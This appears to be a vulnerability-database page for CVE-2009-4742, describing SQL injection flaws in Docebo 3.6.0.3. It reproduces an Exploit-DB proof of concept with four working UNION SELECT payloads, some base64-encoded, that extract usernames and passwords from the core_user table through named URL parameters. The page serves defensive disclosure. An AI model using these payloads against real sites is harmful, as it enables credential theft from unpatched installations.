VIR Vulnerability Intelligence Relay

CVE-2009-4742

high
Published 2010-03-26 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.5

Description

Multiple SQL injection vulnerabilities in Docebo 3.6.0.3 allow remote attackers to execute arbitrary SQL commands via (1) the word parameter in a play help action to the faq module, reachable through index.php; (2) the word parameter in a play keyw action to the link module, reachable through index.php; (3) the id_certificate parameter in an elemmetacertificate action to the meta_certificate module, reachable through index.php; or (4) the id_certificate parameter in an elemcertificate action to the certificate module, reachable through index.php.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-10003 webapps php verified text ยท 2 KB
Andrea Fabrizi ยท 2009-10-09

Docebo 3.6.0.3 - Multiple SQL Injections

text exploit Source: Exploit-DB 
**************************************************************
Application: Docebo
Version affected: 3.6.0.3
Website: http://www.docebo.com
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi (at) gmail (dot) com [email concealed]
Web: http://www.andreafabrizi.it
Vuln: Multiple SQL-Injection Vulnerabilities
**************************************************************

########## EXAMPLE 1 ##########
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g

-> http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=hel
p&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
###############################

########## EXAMPLE 2 ##########
roland@hp6720s:~$ echo -n "' union select 1,userid,pass from core_user
-- " | base64
JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

-> http://localhost/docebo/doceboLms/index.php?modname=link&op=play&mode=ke
yw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=

###############################

########## EXAMPLE 3 ##########
-> http://localhost/docebo/doceboCore/index.php?modname=meta_certificate&op
=elemmetacertificate&id_certificate=3222
union select concat (userid,0x3d,pass),2,3 from core_user limit 1,2
###############################

########## EXAMPLE 4 ##########
-> http://localhost/docebo/doceboCore/index.php?modname=certificate&op=elem
certificate&id_certificate=1123
union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2
###############################

--
Andrea Fabrizi
http://www.andreafabrizi.it

Application impact
VendorProductVersionsFixed
docebodocebo3.6.0.3

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.